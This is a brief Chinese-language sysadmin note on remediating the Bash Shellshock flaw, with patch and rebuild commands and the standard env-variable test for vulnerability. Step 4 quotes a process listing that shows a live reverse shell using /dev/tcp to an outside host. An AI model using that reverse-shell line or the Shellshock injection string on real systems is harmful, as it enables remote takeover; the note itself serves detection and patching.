bash反弹漏洞
2018-04-08Bash Shellshock(Bash远程代码执行)。
1、rpm -Uvh --force http://vault.centos.org/5.11/os/x86_64/CentOS/bash-3.2-32.el5_9.1.x86_64.rpm
2、或者下载bash-3.2-33.el5_11.4.x86_64.rpm和bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm
使用rpm -Uvh安装
3、检测方法:$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test 则漏洞存在
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test 则补丁成功
4、ps -ef|grep www发现有漏洞进程
www 2720 2717 0 12:10 ? 00:00:00 /bin/sh -c exec 9<> /dev/tcp/back.baidu977.com/2040;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;?no crontab for www
5、安装bash-4.4
修改/etc/passwd
root:x:0:0:root:/root:/bin/csh
wget ftp://ftp.cwru.edu/pub/bash/bash-4.4.tar.gz
wget ftp://ftp.gnu.org/pub/gnu/bash/bash-4.4.tar.gz
tar zxf bash-4.4.tar.gz
./configure;make;make install
#####################################
By default, 'make install' will install into '/usr/local/bin',
'/usr/local/man', etc. You can specify an installation prefix other
than '/usr/local' by giving 'configure' the option '--prefix=PATH', or
by specifying a value for the 'DESTDIR' 'make' variable when running
'make install'.